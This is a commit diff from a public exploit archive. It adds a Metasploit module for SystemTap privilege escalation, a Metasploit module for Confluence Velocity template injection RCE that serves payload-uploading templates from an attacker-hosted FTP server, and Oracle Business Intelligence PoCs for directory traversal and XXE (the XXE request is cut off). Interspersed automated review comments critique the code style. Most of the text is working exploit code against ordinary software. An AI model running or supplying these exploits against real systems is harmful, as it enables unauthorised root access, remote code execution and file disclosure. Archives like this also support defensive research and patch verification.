DB: 2019-04-20
4 changes to exploits/shellcodes SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit) Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit) Oracle Business Intelligence 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - Directory Traversal Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection
This commit is contained in:
parent
ab955a9b5d
commit
aaf10d8566
5 changed files with 646 additions and 0 deletions
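--- /dev/null
+++ b/exploits/linux/local/46730.rb
@@ -0,0 +1,142 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+Rank = ExcellentRanking
+
+include Msf::Post::File
+include Msf::Post::Linux::Priv
+include Msf::Post::Linux::System
+include Msf::Exploit::EXE
+include Msf::Exploit::FileDropper
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'SystemTap MODPROBE_OPTIONS Privilege Escalation',
+'Description' => %q{
+This module attempts to gain root privileges by exploiting a
+vulnerability in the `staprun` executable included with SystemTap
+version 1.3.
+
+The `staprun` executable does not clear environment variables prior to
+executing `modprobe`, allowing an arbitrary configuration file to be
+specified in the `MODPROBE_OPTIONS` environment variable, resulting
+in arbitrary command execution with root privileges.
+
+This module has been tested successfully on:
+
+systemtap 1.2-1.fc13-i686 on Fedora 13 (i686); and
+systemtap 1.1-3.el5 on RHEL 5.5 (x64).
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'Tavis Ormandy', # Discovery and exploit
+'bcoles' # Metasploit
+],
+'DisclosureDate' => '2010-11-17',
+'References' =>
+[
+['BID', '44914'],
+['CVE', '2010-4170'],
+['EDB', '15620'],
+['URL', 'https://securitytracker.com/id?1024754'],
+['URL', 'https://access.redhat.com/security/cve/cve-2010-4170'],
+['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=653604'],
+['URL', 'https://lists.fedoraproject.org/pipermail/package-announce/2010-November/051115.html'],
+['URL', 'https://bugs.launchpad.net/bugs/677226'],
+['URL', 'https://www.debian.org/security/2011/dsa-2348']
+],
+'Platform' => ['linux'],
+'Arch' =>
+[
+ARCH_X86,
+ARCH_X64,
+ARCH_ARMLE,
+ARCH_AARCH64,
+ARCH_PPC,
+ARCH_MIPSLE,
+ARCH_MIPSBE
+],
+'SessionTypes' => ['shell', 'meterpreter'],
+'Targets' => [['Auto', {}]],
+'DefaultTarget' => 0))
+register_options [
+OptString.new('STAPRUN_PATH', [true, 'Path to staprun executable', '/usr/bin/staprun'])
+]
+register_advanced_options [
+OptBool.new('ForceExploit', [false, 'Override check result', false]),
+OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+]
+end
+
+def staprun_path
+datastore['STAPRUN_PATH']
+end
+
+def base_dir
+datastore['WritableDir'].to_s
+end
+
+def upload(path, data)
+print_status "Writing '#{path}' (#{data.size} bytes) ..."
+rm_f path
+write_file path, data
+register_file_for_cleanup path
+end
+
+def upload_and_chmodx(path, data)
+upload path, data
+chmod path
+end
+
+def check
+# On some systems, staprun execution is restricted to stapusr group:
+# ---s--x---. 1 root stapusr 178488 Mar 28 2014 /usr/bin/staprun
+unless cmd_exec("test -x '#{staprun_path}' && echo true").include? 'true'
+vprint_error "#{staprun_path} is not executable"
+return CheckCode::Safe
+end
+vprint_good "#{staprun_path} is executable"
+
+unless setuid? staprun_path
+vprint_error "#{staprun_path} is not setuid"
+return CheckCode::Safe
+end
+vprint_good "#{staprun_path} is setuid"
+
+CheckCode::Detected
+end
+
+def exploit
+unless check == CheckCode::Detected
+unless datastore['ForceExploit']
+fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+end
+print_warning 'Target does not appear to be vulnerable'
+end
+
+if is_root?
+unless datastore['ForceExploit']
+fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+end
+end
+
+unless writable? base_dir
+fail_with Failure::BadConfig, "#{base_dir} is not writable"
+end
+
+payload_name = ".#{rand_text_alphanumeric 10..15}"
+payload_path = "#{base_dir}/#{payload_name}"
+upload_and_chmodx payload_path, generate_payload_exe
+
+config_path = "#{base_dir}/#{payload_name}.conf"
+upload config_path, "install uprobes /bin/sh"
+
+print_status 'Executing payload...'
+res = cmd_exec "echo '#{payload_path}&' | MODPROBE_OPTIONS='-C #{config_path}' #{staprun_path} -u #{rand_text_alphanumeric 10..15}"
+vprint_line res
+end
+end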
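Review bot: `check` returns `CheckCode::Detected` after confirming only that STAPRUN_PATH is executable and setuid, so a build patched to scrub the environment before calling modprobe is reported exactly like a vulnerable one, and `exploit` then proceeds on that result. That limitation belongs in a comment above the `unless cmd_exec(...)` line, e.g. `# Only confirms a setuid, executable staprun; the SystemTap version is not checked, so patched builds are also Detected.` The description also names SystemTap 1.3 while the tested builds listed are 1.2 and 1.1, which is worth reconciling. Separately, STAPRUN_PATH and WritableDir are interpolated unquoted into the `res = cmd_exec` command, so a path containing whitespace or shell metacharacters breaks the `staprun -u` invocation; as these are operator-supplied options this is a robustness point rather than a security one.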
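--- /dev/null
+++ b/exploits/multiple/remote/46731.rb
@@ -0,0 +1,465 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+Rank = ExcellentRanking
+
+include Msf::Exploit::EXE
+include Msf::Exploit::FileDropper
+include Msf::Exploit::Remote::HttpClient
+include Msf::Exploit::Remote::FtpServer
+
+def initialize(info={})
+super(update_info(info,
+'Name' => "Atlassian Confluence Widget Connector Macro Velocity Template Injection",
+'Description' => %q{
+Widget Connector Macro is part of Atlassian Confluence Server and Data Center that
+allows embed online videos, slideshows, photostreams and more directly into page.
+A _template parameter can be used to inject remote Java code into a Velocity template,
+and gain code execution. Authentication is unrequired to exploit this vulnerability.
+By default, Java payload will be used because it is cross-platform, but you can also
+specify which native payload you want (Linux or Windows).
+
+Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version
+6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.
+
+This vulnerability was originally discovered by Daniil Dmitriev
+https://twitter.com/ddv_ua.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'Daniil Dmitriev', # Discovering vulnerability
+'Dmitry (rrock) Shchannikov' # Metasploit module
+],
+'References' =>
+[
+[ 'CVE', '2019-3396' ],
+[ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html' ],
+[ 'URL', 'https://chybeta.github.io/2019/04/06/Analysis-for-【CVE-2019-3396】-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/'],
+[ 'URL', 'https://paper.seebug.org/886/']
+],
+'Targets' =>
+[
+[ 'Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }],
+[ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }],
+[ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }]
+],
+'DefaultOptions' =>
+{
+'RPORT' => 8090,
+'SRVPORT' => 8021,
+},
+'Privileged' => false,
+'DisclosureDate' => 'Mar 25 2019',
+'DefaultTarget' => 0,
+'Stance' => Msf::Exploit::Stance::Aggressive
+))
+
+register_options(
+[
+OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),
+OptString.new('TRIGGERURL', [true, 'Url to external video service to trigger vulnerability',
+'https://www.youtube.com/watch?v=dQw4w9WgXcQ'])
+])
+end
+
+# Handles ftp RETP command.
+#
+# @param c [Socket] Control connection socket.
+# @param arg [String] RETR argument.
+# @return [void]
+def on_client_command_retr(c, arg)
+vprint_status("FTP download request for #{arg}")
+conn = establish_data_connection(c)
+if(not conn)
+c.put("425 Can't build data connection\r\n")
+return
+end
+
+c.put("150 Opening BINARY mode data connection for #{arg}\r\n")
+case arg
+when /check\.vm$/
+conn.put(wrap(get_check_vm))
+when /javaprop\.vm$/
+conn.put(wrap(get_javaprop_vm))
+when /upload\.vm$/
+conn.put(wrap(get_upload_vm))
+when /exec\.vm$/
+conn.put(wrap(get_exec_vm))
+else
+conn.put(wrap(get_dummy_vm))
+end
+c.put("226 Transfer complete.\r\n")
+conn.close
+end
+
+# Handles ftp PASS command to suppress output.
+#
+# @param c [Socket] Control connection socket.
+# @param arg [String] PASS argument.
+# @return [void]
+def on_client_command_pass(c, arg)
+@state[c][:pass] = arg
+vprint_status("#{@state[c][:name]} LOGIN #{@state[c][:user]} / #{@state[c][:pass]}")
+c.put "230 Login OK\r\n"
+end
+
+# Handles ftp EPSV command to suppress output.
+#
+# @param c [Socket] Control connection socket.
+# @param arg [String] EPSV argument.
+# @return [void]
+def on_client_command_epsv(c, arg)
+vprint_status("#{@state[c][:name]} UNKNOWN 'EPSV #{arg}'")
+c.put("500 'EPSV #{arg}': command not understood.\r\n")
+end
+
+# Returns a upload template.
+#
+# @return [String]
+def get_upload_vm
+(
+<<~EOF
+$i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}'))
+EOF
+)
+end
+
+# Returns a command execution template.
+#
+# @return [String]
+def get_exec_vm
+(
+<<~EOF
+$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor()
+EOF
+)
+end
+
+# Returns checking template.
+#
+# @return [String]
+def get_check_vm
+(
+<<~EOF
+#{@check_text}
+EOF
+)
+end
+
+# Returns Java's getting property template.
+#
+# @return [String]
+def get_javaprop_vm
+(
+<<~EOF
+$i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{@prop}').toString()
+EOF
+)
+end
+
+# Returns dummy template.
+#
+# @return [String]
+def get_dummy_vm
+(
+<<~EOF
+EOF
+)
+end
+
+# Checks the vulnerability.
+#
+# @return [Array] Check code
+def check
+checkcode = Exploit::CheckCode::Safe
+begin
+# Start the FTP service
+print_status("Starting the FTP server.")
+start_service
+
+@check_text = Rex::Text.rand_text_alpha(5..10)
+res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}check.vm")
+if res && res.body && res.body.include?(@check_text)
+checkcode = Exploit::CheckCode::Vulnerable
+end
+rescue Msf::Exploit::Failed => e
+vprint_error(e.message)
+checkcode = Exploit::CheckCode::Unknown
+end
+checkcode
+end
+
+# Injects Java code to the template.
+#
+# @param service_url [String] Address of template to injection.
+# @return [void]
+def inject_template(service_url, timeout=20)
+
+uri = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview')
+
+res = send_request_cgi({
+'method' => 'POST',
+'uri' => uri,
+'headers' => {
+'Accept' => '*/*',
+'Origin' => full_uri(vhost_uri: true)
+},
+'ctype' => 'application/json; charset=UTF-8',
+'data' => {
+'contentId' => '1',
+'macro' => {
+'name' => 'widget',
+'body' => '',
+'params' => {
+'url' => datastore['TRIGGERURL'],
+'_template' => service_url
+}
+
+}
+}.to_json
+}, timeout=timeout)
+
+unless res
+unless service_url.include?("exec.vm")
+print_warning('Connection timed out in #inject_template')
+end
+return
+end
+
+if res.body.include? 'widget-error'
+print_error('Failed to inject and execute code:')
+else
+vprint_status("Server response:")
+end
+
+vprint_line(res.body)
+
+res
+end
+
+# Returns a system property for Java.
+#
+# @param prop [String] Name of the property to retrieve.
+# @return [String]
+def get_java_property(prop)
+@prop = prop
+res = inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm")
+if res && res.body
+return clear_response(res.body)
+end
+''
+end
+
+# Returns the target platform.
+#
+# @return [String]
+def get_target_platform
+return get_java_property('os.name')
+end
+
+# Checks if the target os/platform is compatible with the module target or not.
+#
+# @return [TrueClass] Compatible
+# @return [FalseClass] Not compatible
+def target_platform_compat?(target_platform)
+target.platform.names.each do |n|
+if n.downcase == 'java' || target_platform.downcase.include?(n.downcase)
+return true
+end
+end
+
+false
+end
+
+# Returns a temp path from the remote target.
+#
+# @return [String]
+def get_tmp_path
+return get_java_property('java.io.tmpdir')
+end
+
+# Returns the Java home path used by Confluence.
+#
+# @return [String]
+def get_java_home_path
+return get_java_property('java.home')
+end
+
+# Returns Java code that can be used to inject to the template in order to copy a file.
+#
+# @note The purpose of this method is to have a file that is not busy, so we can execute it.
+# It is meant to be used with #get_write_file_code.
+#
+# @param fname [String] The file to copy
+# @param new_fname [String] The new file
+# @return [void]
+def get_dup_file_code(fname, new_fname)
+if fname =~ /^\/[[:print:]]+/
+@command = "cp #{fname} #{new_fname}"
+else
+@command = "cmd.exe /C copy #{fname} #{new_fname}"
+end
+
+inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
+end
+
+# Returns the normalized file path for payload.
+#
+# @return [String]
+def normalize_payload_fname(tmp_path, fname)
+# A quick way to check platform insteaf of actually grabbing os.name in Java system properties.
+if /^\/[[:print:]]+/ === tmp_path
+Rex::FileUtils.normalize_unix_path(tmp_path, fname)
+else
+Rex::FileUtils.normalize_win_path(tmp_path, fname)
+end
+end
+
+# Exploits the target in Java platform.
+#
+# @return [void]
+def exploit_as_java
+
+tmp_path = get_tmp_path
+
+if tmp_path.blank?
+fail_with(Failure::Unknown, 'Unable to get the temp path.')
+end
+
+@fname = normalize_payload_fname(tmp_path, "#{Rex::Text.rand_text_alpha(5)}.jar")
+@b64 = Rex::Text.encode_base64(payload.encoded_jar)
+@command = ''
+
+java_home = get_java_home_path
+
+if java_home.blank?
+fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.')
+else
+vprint_status("Found Java home path: #{java_home}")
+end
+
+register_files_for_cleanup(@fname)
+
+if /^\/[[:print:]]+/ === @fname
+normalized_java_path = Rex::FileUtils.normalize_unix_path(java_home, '/bin/java')
+@command = %Q|#{normalized_java_path} -jar #{@fname}|
+else
+normalized_java_path = Rex::FileUtils.normalize_win_path(java_home, '\\bin\\java.exe')
+@fname.gsub!(/Program Files/, 'PROGRA~1')
+@command = %Q|cmd.exe /C "#{normalized_java_path}" -jar #{@fname}|
+end
+
+print_status("Attempting to upload #{@fname}")
+inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
+
+print_status("Attempting to execute #{@fname}")
+inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
+end
+
+
+# Exploits the target in Windows platform.
+#
+# @return [void]
+def exploit_as_windows
+tmp_path = get_tmp_path
+
+if tmp_path.blank?
+fail_with(Failure::Unknown, 'Unable to get the temp path.')
+end
+
+@b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))
+@fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe")
+new_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe")
+@fname.gsub!(/Program Files/, 'PROGRA~1')
+new_fname.gsub!(/Program Files/, 'PROGRA~1')
+register_files_for_cleanup(@fname, new_fname)
+
+print_status("Attempting to upload #{@fname}")
+inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
+
+print_status("Attempting to copy payload to #{new_fname}")
+get_dup_file_code(@fname, new_fname)
+
+print_status("Attempting to execute #{new_fname}")
+@command = new_fname
+inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
+end
+
+
+# Exploits the target in Linux platform.
+#
+# @return [void]
+def exploit_as_linux
+tmp_path = get_tmp_path
+
+if tmp_path.blank?
+fail_with(Failure::Unknown, 'Unable to get the temp path.')
+end
+
+@b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))
+@fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5))
+new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6))
+register_files_for_cleanup(@fname, new_fname)
+
+print_status("Attempting to upload #{@fname}")
+inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm")
+
+@command = "chmod +x #{@fname}"
+inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm")
+
+print_status("Attempting to copy payload to #{new_fname}")
+get_dup_file_code(@fname, new_fname)
+
+print_status("Attempting to execute #{new_fname}")
+@command = new_fname
+inject_template("ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm", timeout=5)
+end
+
+def exploit
+@wrap_marker = Rex::Text.rand_text_alpha(5..10)
+
+# Start the FTP service
+print_status("Starting the FTP server.")
+start_service
+
+target_platform = get_target_platform
+if target_platform.nil?
+fail_with(Failure::Unreachable, 'Target did not respond to OS check. Confirm RHOSTS and RPORT, then run "check".')
+else
+print_status("Target being detected as: #{target_platform}")
+end
+
+unless target_platform_compat?(target_platform)
+fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')
+end
+
+case target.name.downcase
+when /java$/
+exploit_as_java
+when /windows$/
+exploit_as_windows
+when /linux$/
+exploit_as_linux
+end
+end
+
+# Wraps request.
+#
+# @return [String]
+def wrap(string)
+"#{@wrap_marker}\n#{string}#{@wrap_marker}\n"
+end
+
+# Returns unwrapped response.
+#
+# @return [String]
+def clear_response(string)
+if match = string.match(/#{@wrap_marker}\n(.*)\n#{@wrap_marker}\n/m)
+return match.captures[0]
+end
+end
+end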
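Review bot: `inject_template` forwards its timeout as `}, timeout=timeout)`, and the three exec.vm call sites in `exploit_as_java`, `exploit_as_windows` and `exploit_as_linux` pass `timeout=5`; these are assignments used as positional arguments, which only work because a stray local is created in the caller, and they read like keyword arguments to anyone skimming the code. Pass the value directly, `}, timeout)` in `inject_template` and `..., 5)` at the three call sites, or declare `def inject_template(service_url, timeout: 20)` and call with `timeout: 5`. In `on_client_command_retr` the `conn.close` is not wrapped in an `ensure`, so an exception raised by `conn.put` leaks the data connection. The YARD on `check` says `@return [Array] Check code` but a single `Exploit::CheckCode` value is returned, and `clear_response` is documented `@return [String]` yet returns nil when the marker is absent, which is exactly the nil that `exploit` later tests for with `target_platform.nil?`.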
13
exploits/windows/webapps/46728.txt
Normal file
13
exploits/windows/webapps/46728.txt
Normal file
|
@ -0,0 +1,13 @@
|
|||
# Exploit Title: Directory traversal in Oracle Business Intelligence
|
||||
# Date: 16.04.19
|
||||
# Exploit Author: @vah_13
|
||||
# Vendor Homepage: http://oracle.com
|
||||
# Software Link:
|
||||
https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html
|
||||
# Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0
|
||||
# Tested on: Windows
|
||||
# CVE : CVE-2019-2588
|
||||
|
||||
PoC
|
||||
|
||||
http://server:9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini
|
22
exploits/windows/webapps/46729.txt
Normal file
22
exploits/windows/webapps/46729.txt
Normal file
|
@ -0,0 +1,22 @@
|
|||
# Exploit Title: XXE in Oracle Business Intelligence and XML Publisher
|
||||
# Date: 16.04.19
|
||||
# Exploit Author: @vah_13
|
||||
# Vendor Homepage: http://oracle.com
|
||||
# Software Link:
|
||||
https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html
|
||||
# Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0
|
||||
# Tested on: Windows
|
||||
# CVE : CVE-2019-2616 (7.2/10)
|
||||
|
||||
PoC:
|
||||
|
||||
POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
|
||||
Host: host
|
||||
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101
|
||||
Firefox/62.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Content-Length: 76
|
||||
Content-Type: text/xml; charset=UTF-8
|
||||
|
||||
<!DOCTYPE soap:envelope PUBLIC "-//B/A/EN" "http://IP/123 <http://ehost/123>
|
||||
">
|
|
@ -10428,6 +10428,7 @@ id,file,description,date,author,type,platform,port
|
|||
46717,exploits/windows/local/46717.txt,"Microsoft Windows 10 1809 - LUAFV Delayed Virtualization Cache Manager Poisoning Privilege Escalation",2019-04-16,"Google Security Research",local,windows,
|
||||
46718,exploits/windows/local/46718.txt,"Microsoft Windows 10 1809 - LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition Privilege Escalation",2019-04-16,"Google Security Research",local,windows,
|
||||
46727,exploits/multiple/local/46727.rb,"LibreOffice < 6.0.7 / 6.1.3 - Macro Code Execution (Metasploit)",2019-04-18,Metasploit,local,multiple,
|
||||
46730,exploits/linux/local/46730.rb,"SystemTap 1.3 - MODPROBE_OPTIONS Privilege Escalation (Metasploit)",2019-04-19,Metasploit,local,linux,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -17344,6 +17345,7 @@ id,file,description,date,author,type,platform,port
|
|||
46705,exploits/hardware/remote/46705.rb,"Cisco RV130W Routers - Management Interface Remote Command Execution (Metasploit)",2019-04-15,Metasploit,remote,hardware,
|
||||
46719,exploits/windows/remote/46719.py,"MailCarrier 2.51 - POP3 'RETR' SEH Buffer Overflow",2019-04-17,"Dino Covotsos",remote,windows,110
|
||||
46725,exploits/windows/remote/46725.rb,"ManageEngine Applications Manager 11.0 < 14.0 - SQL Injection / Remote Code Execution (Metasploit)",2019-04-18,AkkuS,remote,windows,
|
||||
46731,exploits/multiple/remote/46731.rb,"Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)",2019-04-19,Metasploit,remote,multiple,
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -41162,3 +41164,5 @@ id,file,description,date,author,type,platform,port
|
|||
46694,exploits/php/webapps/46694.txt,"DirectAdmin 1.561 - Multiple Vulnerabilities",2019-04-15,InfinitumIT,webapps,php,
|
||||
46706,exploits/hardware/webapps/46706.txt,"Zyxel ZyWall 310 / ZyWall 110 / USG1900 / ATP500 / USG40 - Login Page Cross-Site Scripting",2019-04-16,"Aaron Bishop",webapps,hardware,80
|
||||
46710,exploits/php/webapps/46710.py,"Joomla Core 1.5.0 - 3.9.4 - Directory Traversal / Authenticated Arbitrary File Deletion",2019-04-16,"Haboob Team",webapps,php,80
|
||||
46728,exploits/windows/webapps/46728.txt,"Oracle Business Intelligence 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - Directory Traversal",2019-04-19,"Vahagn Vardanyan",webapps,windows,
|
||||
46729,exploits/windows/webapps/46729.txt,"Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection",2019-04-19,"Vahagn Vardanyan",webapps,windows,
|
||||
|
|